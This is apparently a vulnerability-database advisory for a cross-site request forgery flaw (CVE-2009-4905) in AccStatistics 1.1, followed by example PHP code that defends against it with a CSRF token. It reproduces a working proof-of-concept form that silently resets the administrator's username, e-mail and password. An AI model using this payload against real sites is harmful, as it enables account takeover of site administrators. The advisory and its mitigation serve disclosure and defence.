Acc Statistics 'index.php' Multiple Cross-Site Request Forgery Vulnerabilities

Vulnerability ID 1118762 Vulnerability type Cross-site request forgery
Published 2009-12-13 Updated 2010-06-25
CVE number CVE-2009-4905 CNNVD-ID CNNVD-201006-408
Platform PHP CVSS score 6.8
|Vulnerability sources
https://www.exploit-db.com/exploits/10406
https://www.securityfocus.com/bid/79117
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201006-408
|Vulnerability details
AccStatistics is a free website statistics script. AccStatistics can tell you how your visitors found you and how many visitors came to your site. index.php in AccStatistics 1.1 has multiple cross-site request forgery vulnerabilities. Remote attackers can hijack the authentication of administrator users to change (1) passwords, (2) usernames, and (3) e-mail addresses.
|Vulnerability EXP
[-------------------------------------------------------------------------------------------------]
[   Title: AccStatistics v1.1 XSRF Vulnerability (Change Admin Settings)                          ]
[   Author: Milos Zivanovic                                                                       ]
[   Date: 13. December 2009.                                                                      ]
[-------------------------------------------------------------------------------------------------]

[-------------------------------------------------------------------------------------------------]
[   Application: AccStatistics                                                                    ]
[   Version: v1.1                                                                                 ]
[   Download: http://www.accstatistics.com/download/accstatistics.zip                             ]
[   Vulnerability: Cross Site Request Forgery                                                     ]
[-------------------------------------------------------------------------------------------------]

I've tested this on the demo version where the name attribute of the submit button is 'preview'. I doubt that's
the name in the real thing. I don't know what the name tag of it is but it's usually 'submit' or
'save' (could be something else).

With this exploit we can change a lot of stuff, but some of the most critical would be:
username, email, password...

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/accstatistics/demo/index.php" method="POST">
  <input type="hidden" name="p" value="edit1">
  <input type="hidden" name="id" value="1">
  <input type="hidden" id="input_username" name="input_username" value="admin">
  <input type="hidden" id="input_email" name="input_email" value="my@email.com">
  <input type="password" id="input_password" name="input_password" value="hacked">
  <input type="password" id="input_password1" name="input_password1" value="hacked">
  <input type="hidden" id="input_sitename" name="input_sitename" value="AccStatistics">
  <input type="hidden" id="input_ignoredomains" name="input_ignoredomains" value="">
  <input type="hidden" id="input_ignoremyvisits" name="input_ignoremyvisits" value="1">
  <input type="hidden" id="input_ignoresubdomenins" name="input_ignoresubdomenins" value="1">
  <input type="hidden" id="input_rowsperpage" name="input_rowsperpage" value="30">
  <input type="checkbox" id="input_reset" name="input_reset" value="1">
  <input type="submit" name="preview" value="Save">
</form>

[EXPLOIT------------------------------------------------------------------------------------------]

[----------------------------------------------EOF------------------------------------------------]
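The forged form above works because the settings handler behind index.php?p=edit1 accepts any POST carrying the admin's session cookie. The following is an added example, not AccStatistics code: a synchronizer-token check for that handler, using the field names from the PoC (p, input_username, input_password, preview); the handler structure, the csrf_token field name and the PHP 7+ runtime are assumptions.

```php
<?php
// Added example (not AccStatistics code): synchronizer-token protection for the
// settings form reached via index.php?p=edit1. Assumes PHP 7 or later.
session_start();

function csrf_token(): string {
    // One token per session, from a CSPRNG; never derived from the session id.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_request_is_valid(array $post, array $server): bool {
    // Constant-time comparison of the submitted token with the session token.
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = (string)($post['csrf_token'] ?? '');
    if ($expected === '' || !hash_equals($expected, $given)) {
        return false;
    }
    // Defence in depth: when the browser sends Origin, it must match our host.
    if (isset($server['HTTP_ORIGIN'])) {
        $originHost = parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST);
        $ownHost    = strtok($server['HTTP_HOST'] ?? '', ':'); // drop any :port
        if ($originHost === null || $originHost !== $ownHost) {
            return false;
        }
    }
    return true;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['p'] ?? '') === 'edit1') {
    if (!csrf_request_is_valid($_POST, $_SERVER)) {
        http_response_code(403);
        exit('Rejected: missing or invalid CSRF token');
    }
    // Only here is it safe to apply input_username / input_email / input_password.
}
?>
<!-- The legitimate form carries the token; a form hosted on another origin cannot read it. -->
<form action="index.php" method="POST">
  <input type="hidden" name="p" value="edit1">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="text" name="input_username" value="">
  <input type="password" name="input_password" value="">
  <input type="submit" name="preview" value="Save">
</form>
```

For the password and e-mail fields specifically, requiring the current password in the same request closes the remaining window even if a token ever leaks.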
|Affected products
Accscripts Acc Statistics 1.1
|References

Source: VUPEN
Name: ADV-2009-3509
Link: http://www.vupen.com/english/advisories/2009/3509
Source: EXPLOIT-DB
Name: 10406
Link: http://www.exploit-db.com/exploits/10406
Source: SECUNIA
Name: 37694
Link: http://secunia.com/advisories/37694